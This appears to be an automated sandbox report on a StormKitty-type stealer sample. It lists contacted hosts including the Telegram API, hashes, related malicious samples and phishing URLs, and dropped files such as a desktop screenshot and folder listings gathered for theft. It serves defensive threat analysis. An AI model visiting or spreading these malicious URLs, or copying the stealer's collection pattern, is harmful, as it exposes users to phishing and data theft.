https://docs.google.com/presentation/installwebapp?usp=chrome_default	chrome.exe, 0000000A.00000003.1025895513.000016F400778000.00000004.00001000.00020000.00000000.sdmp	false		high
https://passwords.google.comSaved	chrome.exe, 0000000A.00000002.1054200717.000001CF82850000.00000002.00000001.00040000.00000012.sdmp	false		high
https://lens.google.com/gen204	chrome.exe, 0000000A.00000002.1072310952.000016F400590000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1032028147.000016F401554000.00000004.00001000.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	false
142.250.185.196	www.google.com	United States	15169	GOOGLEUS	false
34.117.59.81	ipinfo.io	United States	139070	GOOGLE-AS-APGoogleAsiaPacificPteLtdSG	false
104.26.1.100	get.geojs.io	United States	13335	CLOUDFLARENETUS	false

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1638548
Start date and time:	2025-03-14 14:21:13 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 28s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	23
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	StormKittyXZeroTrace.exe.bin.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@33/31@6/5
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 64 Number of non-executed functions: 1
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, sppsvc.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, TextInputHost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 142.250.181.238, 142.250.185.195, 74.125.133.84, 142.250.185.174, 216.58.212.142, 216.58.206.78, 172.217.18.14, 142.250.186.78, 20.12.23.50, 23.199.214.10
Excluded domains from analysis (whitelisted): fs.microsoft.com, clients2.google.com, accounts.google.com, redirector.gvt1.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, clientservices.googleapis.com, clients.l.google.com, c.pki.goog, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtQueryVolumeInformationFile calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
09:22:13	API Interceptor	90x Sleep call for process: StormKittyXZeroTrace.exe.bin.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
149.154.167.220	believe.ps1	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	INV000001203.scr	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	http://iono-webnail.vercel.app/	Get hash	malicious	HTMLPhisher	Browse
	general2.exe	Get hash	malicious	XWorm	Browse
	file.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	XClient.exe.bin.exe	Get hash	malicious	XWorm	Browse
	Bank_Statement.html	Get hash	malicious	HTMLPhisher	Browse
	NDQ211216GM08.exe.bin.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	SOA Since OCT DEC 241738316681530012900.bat	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
34.117.59.81	Document25.xlsm	Get hash	malicious	ScreenConnect Tool, AsyncRAT, StormKitty, VenomRAT	Browse	ipinfo.io/ip
	brave.ps1	Get hash	malicious	Unknown	Browse	ipinfo.io//json
	path.exe	Get hash	malicious	Unknown	Browse	ipinfo.io/json
	SecuriteInfo.com.Win64.Evo-gen.26839.29040.exe	Get hash	malicious	Unknown	Browse	ipinfo.io/json
	SecuriteInfo.com.Win64.Evo-gen.26839.29040.exe	Get hash	malicious	Unknown	Browse	ipinfo.io/json
	QkRFz2sau5.exe	Get hash	malicious	Amadey, AsyncRAT, LiteHTTP Bot, LummaC Stealer, PureLog Stealer	Browse	ipinfo.io/ip
	0t8amSU3vd.exe	Get hash	malicious	CryptoWall, TrojanRansom	Browse	ipinfo.io/ip
	file.exe	Get hash	malicious	Invicta Stealer, XWorm	Browse	ipinfo.io/json
	Code%20Send%20meta%20Discord%20EXE.ps1	Get hash	malicious	Unknown	Browse	ipinfo.io/json
	idl57nk7gk.exe	Get hash	malicious	Neshta	Browse	ipinfo.io/json
104.26.1.100	install.exe	Get hash	malicious	Unknown	Browse	get.geojs.io/v1/ip/geo.json

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ipinfo.io	http://case-id-1000228256976.counselschambers.co.uk/	Get hash	malicious	Unknown	Browse	34.117.59.81
	http://case-id-1000228257539.counselschambers.co.uk/	Get hash	malicious	Unknown	Browse	34.117.59.81
	http://case-id-1000228246008.counselschambers.co.uk/	Get hash	malicious	Unknown	Browse	34.117.59.81
	http://case-id-1000228260751.counselschambers.co.uk/	Get hash	malicious	Unknown	Browse	34.117.59.81
	http://case-id-1000228257110.counselschambers.co.uk/	Get hash	malicious	Unknown	Browse	34.117.59.81
	http://case-id-1000228256764.counselschambers.co.uk/	Get hash	malicious	Unknown	Browse	34.117.59.81
	http://case-id-1000228258055.counselschambers.co.uk/	Get hash	malicious	Unknown	Browse	34.117.59.81
	http://case-id-1000228254452.counselschambers.co.uk/	Get hash	malicious	Unknown	Browse	34.117.59.81
	http://case-id-1000228259397.counselschambers.co.uk/	Get hash	malicious	Unknown	Browse	34.117.59.81
	http://case-id-1000228258209.counselschambers.co.uk/	Get hash	malicious	Unknown	Browse	34.117.59.81
get.geojs.io	https://encryption-marinha.jkndfuzv.ru/PtM2i/$nadia.sofia.rijo@marinha.pt	Get hash	malicious	Unknown	Browse	104.26.1.100
	VM Orger Acknowledged.zip	Get hash	malicious	Unknown	Browse	172.67.70.233
	http://briefing-individual-construct.vercel.app/	Get hash	malicious	HTMLPhisher	Browse	104.26.0.100
	https://newsletter-editor.poweredbyintegra.dk/?NewsLetterTracker=true&bio=holstebrony&newsletter_ID=1&Text=Eget%20billede%20(ingen%20mellemrum)&Code=106&utcmabite=f9d0de3f-59af-46e8-b932-e8ab5db62f67&biocode=holstebrony&RedirectUrl=moviepazes.com/gredso/80c1f3626fe2dec57456150d34de5b50/ZGF2aWQuc2VkbGlja0BvbmVhdGxhcy5jb20=	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse	104.26.0.100
	https://vwj9ymusjv9xeh65cf602u2rmsnkbyf2u7lxtnawlaim1gvceu.moydow.de/5417971987/6327230191/#bnBkL3NmdW9mZGJvYnlmdUFob2p0Ymlkc3ZxJTBsU3RkM0cwdnMvbmJmeXN1VGZ1ekMvezJsdWZxUFhXV0wyNVRmOXZqWkk5eUZbbXJie04xTTZIREp2cGN5dTlRMzplOFZkVEQwMDt0cXV1aQ==	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse	104.26.1.100
	attach.svg	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse	104.26.1.100
	Play_VM-NowPhishingAudiowav011.html	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse	104.26.1.100
	Fw_ VN MSG 4_42_16 AM DURATION_0f0b5f5e889448e7c935c0db95b1d2a6.msg	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse	104.26.1.100
	R9rwNLVzpr.exe	Get hash	malicious	Phemedrone Stealer	Browse	104.26.1.100
	cndx.com.eml	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse	104.26.1.100
api.telegram.org	believe.ps1	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	INV000001203.scr	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	http://iono-webnail.vercel.app/	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	general2.exe	Get hash	malicious	XWorm	Browse	149.154.167.220
	https://nettl.ntfs2.shop/	Get hash	malicious	Unknown	Browse	149.154.167.220
	file.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	XClient.exe.bin.exe	Get hash	malicious	XWorm	Browse	149.154.167.220
	Bank_Statement.html	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	NDQ211216GM08.exe.bin.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	ZEemZXPukh.exe	Get hash	malicious	LummaC Stealer	Browse	149.154.167.99
	Spacey Sun 11.12.411.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	Spacey Sun 11.12.411.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	DEVM25.exe	Get hash	malicious	LummaC Stealer	Browse	149.154.167.99
	believe.ps1	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	ShadowLoader.exe	Get hash	malicious	LummaC Stealer	Browse	149.154.167.99
	INV000001203.scr	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	http://iono-webnail.vercel.app/	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	RbCSdRdU5F.exe	Get hash	malicious	Unknown	Browse	149.154.167.99
	RbCSdRdU5F.exe	Get hash	malicious	Unknown	Browse	149.154.167.99
GOOGLE-AS-APGoogleAsiaPacificPteLtdSG	RV Please verify your email preferences.msg	Get hash	malicious	Unknown	Browse	34.117.77.79
	http://case-id-1000228256976.counselschambers.co.uk/	Get hash	malicious	Unknown	Browse	34.117.59.81
	http://case-id-1000228257539.counselschambers.co.uk/	Get hash	malicious	Unknown	Browse	34.117.59.81
	http://case-id-1000228246008.counselschambers.co.uk/	Get hash	malicious	Unknown	Browse	34.117.59.81
	https://currently564432.weebly.com/	Get hash	malicious	HTMLPhisher	Browse	34.67.147.7
	http://case-id-1000228260751.counselschambers.co.uk/	Get hash	malicious	Unknown	Browse	34.117.59.81
	http://case-id-1000228257110.counselschambers.co.uk/	Get hash	malicious	Unknown	Browse	34.117.59.81
	http://case-id-1000228256764.counselschambers.co.uk/	Get hash	malicious	Unknown	Browse	34.117.59.81
	http://case-id-1000228258055.counselschambers.co.uk/	Get hash	malicious	Unknown	Browse	34.117.59.81
	http://case-id-1000228254452.counselschambers.co.uk/	Get hash	malicious	Unknown	Browse	34.117.59.81
CLOUDFLARENETUS	____ ______.xls.lnk.bin.lnk	Get hash	malicious	Metasploit	Browse	172.67.160.19
	ZEemZXPukh.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.97.3
	http://allstareventsmiami.com	Get hash	malicious	Unknown	Browse	172.67.142.245
	SOA FEB 2025.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	104.21.96.1
	https://intimidadcondiosgt.com/fghjwssxhj/2pIU6hxd/Y2l0eXRpdGxlQGNpdHl0aXRsZWFnZW5jeS5jb20N	Get hash	malicious	Unknown	Browse	172.67.136.69
	Spacey Sun 11.12.411.exe	Get hash	malicious	Vidar	Browse	172.64.41.3
	https://www.google.co.zm/url?q=https%3A%2F%2Fembalagenspontual.com%2F.dnd%2F&sa=D&sntz=1&usg=AOvVaw2fQzlrSA6WjuVq4o5C-GZh#?470265860475745Family=X2NlYzY3QG5hc2hpbnRsLmNvbQ==	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse	104.17.25.14
	https://fortuneurl.com/qdQgK	Get hash	malicious	Unknown	Browse	104.22.20.144
	13.03.2025-13.03.2025 shtml.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	104.21.32.1
	http://188.114.96.0	Get hash	malicious	Unknown	Browse	104.18.31.19

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	Cqqjbi.exe	Get hash	malicious	Unknown	Browse	104.26.1.100 149.154.167.220 34.117.59.81
	Cqqjbi.exe	Get hash	malicious	Unknown	Browse	104.26.1.100 149.154.167.220 34.117.59.81
	SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exe	Get hash	malicious	ScreenConnect Tool	Browse	104.26.1.100 149.154.167.220 34.117.59.81
	SecuriteInfo.com.W32.Lolbas.A.tr.25597.31355.exe	Get hash	malicious	ScreenConnect Tool	Browse	104.26.1.100 149.154.167.220 34.117.59.81
	SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exe	Get hash	malicious	ScreenConnect Tool	Browse	104.26.1.100 149.154.167.220 34.117.59.81
	NursultanClient.exe1.exe	Get hash	malicious	Unknown	Browse	104.26.1.100 149.154.167.220 34.117.59.81
	SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exe	Get hash	malicious	ScreenConnect Tool	Browse	104.26.1.100 149.154.167.220 34.117.59.81
	NursultanClient.exe1.exe	Get hash	malicious	Unknown	Browse	104.26.1.100 149.154.167.220 34.117.59.81
	Client-built.exe	Get hash	malicious	Discord Rat	Browse	104.26.1.100 149.154.167.220 34.117.59.81
	SecuriteInfo.com.W32.Lolbas.A.tr.29609.16284.exe	Get hash	malicious	ScreenConnect Tool	Browse	104.26.1.100 149.154.167.220 34.117.59.81

Process:	C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1736
Entropy (8bit):	5.354690381041344
Encrypted:	false
SSDEEP:	48:MxHKlYHKh3oWHKoHzHmtHo6hAHKzebHpHt1qHjHKs:iqlYqh3oWqoTGtI6eqzsJNwDqs
MD5:	29A6370DDEE7BF7AFF063715A0290ABF
SHA1:	D438891EAD86A3E84B5FFEFDA9876DAA299774A1
SHA-256:	AECFD70605FAD3DE1399B4FD222175417236A3CCF13253973B7F0A1324E70D5D
SHA-512:	934533FE903FD2A6BECAD72ECD9EA7E9DC19737031044111C2E1568DA0A8CAF8AB3BF9C71074661717ABAF2A5DEB3C6597E72681011A14E31DF8C3B01E8601F9
Malicious:	true
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..2,"System.IO.Compression, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Net.Http, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Net.Http\bb5812ab3cec92427da8c5c696e5f731\System.Net.Http.ni.dll",0..2,"System.Web.Extensions, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4

C:\Users\user\AppData\Local\Temp\8.46.123.189.zip

Download File

Process:	C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	686505
Entropy (8bit):	7.9978828524716175
Encrypted:	true
SSDEEP:	12288:p6OZXOTZ6Im1HtKZBvbnkXE8m4NrR2KjSFMyhmAOs8wqD5nWMy0Ako3iX0U6E:bZX0COvbnkXE85NkMy8j1xWMAko3xW
MD5:	3A967738661AA383AB23BF73F752C990
SHA1:	812B8116D0226BA47EE6E6A7FD489991C12DA762
SHA-256:	C5FA164FF0D461D2E6A396535420AB69A9297E3D83BA7EF11770A869BC3673C7
SHA-512:	88B947D9677C9718B245113CC3672366BB20D278536DE046DB5659016AF4B37199FFAC60D574199AB3C621E61AB7780AB1544654C27EBC61BABE1094F6A0E855
Malicious:	false
Preview:	PK.........JnZ..=..K.....".$.8.46.123.189/DesktopScreenshot.png.. ..........}......}......}.....d.{<...?~m&...D%..1R......j.1.&:I%.4.F..l...S...@9..L..r>.9.9m.o^...s.}o.?..].e...~x<.W....=.....c.4....._!....B.g.....%s...M....M..... .yu.P.............'...lgY...=.2...k.j...x.....h p.;.r,.A...[^n.....\.O.@;...t.G.t.-...=..e!...U...y..+...;I.l.yV..U....Ob..%.,H......Nb.RR.^U.?.2.}.^.k.........5.t.`.N.$._.....N.\8o.tfb.R.&.Ju.....1.d s.@.t.....'4.x.'.j.s9c.'..Y.>.2......$...:.1.p..Q...8.8..^..-dH...]....FZ.....U]...`..h..p.$......n.g.........[X......^...J.Y....W0`(u5..k.,..t.WB..7...R..DZW..0...n-a]9!p........%f9.S/Sd]u.....y.b[jU.l.....].W.+k.._...h.z!...a0^~..92..9=.r.a..c]..'D.Ae.>.]j.Gg6....V.R.i.....-..~.$Te.{5.{..2..~R<..JM...'_.-xe..%.K].x.>+t..m...).f..z[.z..b.~...E.R...a....k&.......]v..b......d....=U.v.>.....8a.t]....qH..<..-..PG.].P!<8.....>.ox.;.50...\|G..%.z...m....].]!.......w/.~..oo.z..Zs.s=${%$..T.nz..s/'.j.3g.U.F~YyX.c-..jnj.

C:\Users\user\AppData\Local\Temp\8.46.123.189\Browsers\Firefox\FirefoxBookmarks.txt

Download File

Process:	C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	105
Entropy (8bit):	3.8863455911790052
Encrypted:	false
SSDEEP:	3:RGtjybXLGSWK+ZjMGvRS3ZMz9GSOLj2SjyRE2qJ:hvWF7Ipg9OL2RE2m
MD5:	2E9D094DDA5CDC3CE6519F75943A4FF4
SHA1:	5D989B4AC8B699781681FE75ED9EF98191A5096C
SHA-256:	C84C98BBF5E0EF9C8D0708B5D60C5BB656B7D6BE5135D7F7A8D25557E08CF142
SHA-512:	D1F7EED00959E902BDB2125B91721460D3FF99F3BDFC1F2A343D4F58E8D4E5E5A06C0C6CDC0379211C94510F7C00D7A8B34FA7D0CA0C3D54CBBE878F1E9812B7
Malicious:	false
Preview:	### Get Help ###.### Customize Firefox ###.### Get Involved ###.### About Us ###.### Getting Started ###.

C:\Users\user\AppData\Local\Temp\8.46.123.189\DesktopScreenshot.png

Download File

Process:	C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe
File Type:	PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	692940
Entropy (8bit):	7.925276779721248
Encrypted:	false
SSDEEP:	12288:t50oQZul4+IykVUYgEmI7tAjzVYeoZM5Nfj9ps+lDuqdrObV8QVzL4JnQc8WyTgS:t5hQVp4IkqhgNbbHnqEQc6Uhxjwe6Sp+
MD5:	CD09C54AE6812F36276BF4E86741BF13
SHA1:	541960EE91C072DCD6DFDE7D5985612EFD479D0F
SHA-256:	AA4B75C75EA4AB3144A5ECF4A66BCDEC44B0211606D2AEE0D1D368C7F639C2E6
SHA-512:	4FBB18D4BED0D66BE98166287F9CF79814763F61562EDA122565E04F5F901FDDB2446C6F86622F8A3980220810D05732CE02849220606993BB902CE1AC40409A
Malicious:	false
Preview:	.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..w.mU.....TwW?.u...{-...]U}..B.....R$...#`.9...9.J..b.j-.@.....C...` .:..3....]c.+..9...y>......s...z..y.....&..}x..i..6?.u./..=}a..a.9....tNM?w8..(......$...3u.....:..Y..b.@..K.c......c..yd.p.....Fb.x..@..}.0u......P......`.......HL.1w....ej.t?..y1.....C.(...g,.....{.t..W.....w.,..s S..i..t......e...;n....m..HL.mnt...L.L...5oN....SoJy.....L.a0K..+.S..u ...z..3...z..z ..f....+..=.m_c..ic..[fx..-...2..w..o.:...Z..[.%.o...+o.L......r.....`i....{..U.......q...Nq..J....,90..K_..j`.y.....S._..V...j..i....._~M..X.....p].-...j..S.~)......sm5..5Uw....W.>.e/O..b...i..w}.".,O.Rb).v.y.....<.x:......zl*]...8,...j.^i....{....tw.......j.>i...\.e{..{.}w....ryn.wK.........~..1,.+]+..]....yef...._KK.....K...n..Vc....9..w2....vI..\|B.../.L...4&'.....y.vL...........e;..M..n{I;.s.a.i_..b-........i}j5^.]...jz.t..'.<A.y`n.N.;O1........9...E9.\].k1..

C:\Users\user\AppData\Local\Temp\8.46.123.189\Directories\Desktop.txt

Download File

Process:	C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	839
Entropy (8bit):	5.281555327390614
Encrypted:	false
SSDEEP:	12:wvTj4VjxsQe4SQutyjmFbatYnisYcsKcNoSVeLKpj8ZmWiPizsbDSNB27kx/xu:CEW7tIml7ebZ7NQiPtbDS/2q/xu
MD5:	7CE978BB3C76DEF8155535919C9EBDBA
SHA1:	9F39C35EECCB4C4C21DEF949977886A7508EC14B
SHA-256:	D66BA33719A69DD0854DD8DE883EA491A833CE89BCAC374B220EF130014E95AF
SHA-512:	7357C349A7D4E3621FCE37D085D45C30496CF624779BCF990FDA1FD1F5D06CB8D58A1B84832308B9E7A9CDDCC91A913FFAF4754A5212D55FAA0988F201078A93
Malicious:	false
Preview:	Desktop\...DUUDTUBZFW\....DUUDTUBZFW.docx....EIVQSAOTAQ.jpg....EOWRVPQCCS.xlsx....EWZCVGNOWT.png....GIGIYTFFYT.mp3....ZGGKNSUKOP.pdf...EIVQSAOTAQ\....EIVQSAOTAQ.docx....HMPPSXQPQV.mp3....KLIZUSIQEN.xlsx....NWCXBPIUYI.jpg....QCOILOQIKC.pdf....UNKRLCVOHV.png...GLTYDMDUST\...HQJBRDYKDE\...KLIZUSIQEN\...LFOPODGVOH\...TQDFJHPUIU\...WSHEJMDVQC\...ZGGKNSUKOP\....EWZCVGNOWT.xlsx....JDDHMPCDUJ.jpg....KLIZUSIQEN.pdf....NWCXBPIUYI.mp3....NYMMPCEIMA.png....ZGGKNSUKOP.docx...desktop.ini...DUUDTUBZFW.docx...EIVQSAOTAQ.docx...EIVQSAOTAQ.jpg...EOWRVPQCCS.docx...EOWRVPQCCS.xlsx...EWZCVGNOWT.png...EWZCVGNOWT.xlsx...Excel.lnk...GIGIYTFFYT.mp3...HMPPSXQPQV.mp3...JDDHMPCDUJ.jpg...KLIZUSIQEN.pdf...KLIZUSIQEN.xlsx...NWCXBPIUYI.jpg...NWCXBPIUYI.mp3...NYMMPCEIMA.png...QCOILOQIKC.pdf...StormKittyXZeroTrace.exe.bin.exe...UNKRLCVOHV.png...ZGGKNSUKOP.pdf..

C:\Users\user\AppData\Local\Temp\8.46.123.189\Directories\Documents.txt

Download File

Process:	C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	946
Entropy (8bit):	5.345575718708244
Encrypted:	false
SSDEEP:	12:QVj4VjxsQe4SQutyjmFgPLKQ4wRLKTLKBLKMkLKotYnisYcsKcNoSVeLKpj8ZWbD:QJEW7tImPxrqEEtebZ7Np0bDS/eWIu
MD5:	A723060409B3CE4DDE5124C2061F5720
SHA1:	71E215E06C8968D8DA3B407EF10F9422FBF38B4F
SHA-256:	B715853615E6098A229E24455F4654D3C13C8FA099F03D6187FE818EBEC36EF1
SHA-512:	6C4D0A69C1DF13A81EA96C51F30B8FBABA57A1028A1B2999EECC28E4CDE3EF428E26AC7F8EF8011CE208A7704C483519E83D740E25CE1D94D852C9ABB1A4C372
Malicious:	false
Preview:	Documents\...DUUDTUBZFW\....DUUDTUBZFW.docx....EIVQSAOTAQ.jpg....EOWRVPQCCS.xlsx....EWZCVGNOWT.png....GIGIYTFFYT.mp3....ZGGKNSUKOP.pdf...EIVQSAOTAQ\....EIVQSAOTAQ.docx....HMPPSXQPQV.mp3....KLIZUSIQEN.xlsx....NWCXBPIUYI.jpg....QCOILOQIKC.pdf....UNKRLCVOHV.png...GLTYDMDUST\...HQJBRDYKDE\...KLIZUSIQEN\...LFOPODGVOH\...My Music\....desktop.ini...My Pictures\....Camera Roll\.....desktop.ini....Saved Pictures\.....desktop.ini....desktop.ini...My Videos\....desktop.ini...TQDFJHPUIU\...WSHEJMDVQC\...ZGGKNSUKOP\....EWZCVGNOWT.xlsx....JDDHMPCDUJ.jpg....KLIZUSIQEN.pdf....NWCXBPIUYI.mp3....NYMMPCEIMA.png....ZGGKNSUKOP.docx...desktop.ini...DUUDTUBZFW.docx...EIVQSAOTAQ.docx...EIVQSAOTAQ.jpg...EOWRVPQCCS.xlsx...EWZCVGNOWT.png...EWZCVGNOWT.xlsx...GIGIYTFFYT.mp3...HMPPSXQPQV.mp3...JDDHMPCDUJ.jpg...KLIZUSIQEN.pdf...KLIZUSIQEN.xlsx...NWCXBPIUYI.jpg...NWCXBPIUYI.mp3...NYMMPCEIMA.png...QCOILOQIKC.pdf...UNKRLCVOHV.png...ZGGKNSUKOP.docx...ZGGKNSUKOP.pdf..

C:\Users\user\AppData\Local\Temp\8.46.123.189\Directories\Downloads.txt

Download File

Process:	C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	338
Entropy (8bit):	5.264694999405297
Encrypted:	false
SSDEEP:	6:3tSLKIajS5rvZ8EI/PTI/GtJsbbBME3CNNdPbeudZGMv:QLKpj8ZWbzsbDSNBeudIu
MD5:	6A3606CF2DEB5DF6D51D661BB58AD1C8
SHA1:	94CCE977F3FC7D94637D2322772F79DF14853265
SHA-256:	85CBC54277F8470377901B0A086BF6178A5FC70D42CBD01BB322A2C37A936910
SHA-512:	68BC9083C0DF60DC20A7F30A39329EE3090466B171DE198CE32C8A0981A14B3E18E1C6E03908D4A156ACD57092D10C96FFD06A675AB4A0CE45E49DE4AED12B0E
Malicious:	false
Preview:	Downloads\...desktop.ini...DUUDTUBZFW.docx...EIVQSAOTAQ.docx...EIVQSAOTAQ.jpg...EOWRVPQCCS.xlsx...EWZCVGNOWT.png...EWZCVGNOWT.xlsx...GIGIYTFFYT.mp3...HMPPSXQPQV.mp3...JDDHMPCDUJ.jpg...KLIZUSIQEN.pdf...KLIZUSIQEN.xlsx...NWCXBPIUYI.jpg...NWCXBPIUYI.mp3...NYMMPCEIMA.png...QCOILOQIKC.pdf...UNKRLCVOHV.png...ZGGKNSUKOP.docx...ZGGKNSUKOP.pdf..

C:\Users\user\AppData\Local\Temp\8.46.123.189\Directories\OneDrive.txt

Download File

Process:	C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.023465189601646
Encrypted:	false
SSDEEP:	3:1hiR8LKB:14R8LKB
MD5:	966247EB3EE749E21597D73C4176BD52
SHA1:	1E9E63C2872CEF8F015D4B888EB9F81B00A35C79
SHA-256:	8DDFC481B1B6AE30815ECCE8A73755862F24B3BB7FDEBDBF099E037D53EB082E
SHA-512:	BD30AEC68C070E86E3DEC787ED26DD3D6B7D33D83E43CB2D50F9E2CFF779FEE4C96AFBBE170443BD62874073A844BEB29A69B10C72C54D7D444A8D86CFD7B5AA
Malicious:	false
Preview:	OneDrive\...desktop.ini..

C:\Users\user\AppData\Local\Temp\8.46.123.189\Directories\Pictures.txt

Download File

Process:	C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	88
Entropy (8bit):	4.450045114302317
Encrypted:	false
SSDEEP:	3:YzIVqIPLKmwHW8LKKrLKB:nqyLKmYNLKCLKB
MD5:	D430E8A326E3D75F5E49C40C111646E7
SHA1:	D8F2494185D04AB9954CD78268E65410768F6226
SHA-256:	22A45B5ECD9B66441AE7A7AB161C280B6606F920A6A6C25CD7B9C2D4CEB3254D
SHA-512:	1E8139844D02A3009EE89E2DC33CF9ED79E988867974B1291ABA8BC26C30CB952F10E88E0F44A4AEEE162A27E71EAA331CF8AC982B4179DC8203F6F7280BA5AE
Malicious:	false
Preview:	Pictures\...Camera Roll\....desktop.ini...Saved Pictures\....desktop.ini...desktop.ini..

C:\Users\user\AppData\Local\Temp\8.46.123.189\Directories\Startup.txt

Download File

Process:	C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	24
Entropy (8bit):	4.053508854797679
Encrypted:	false
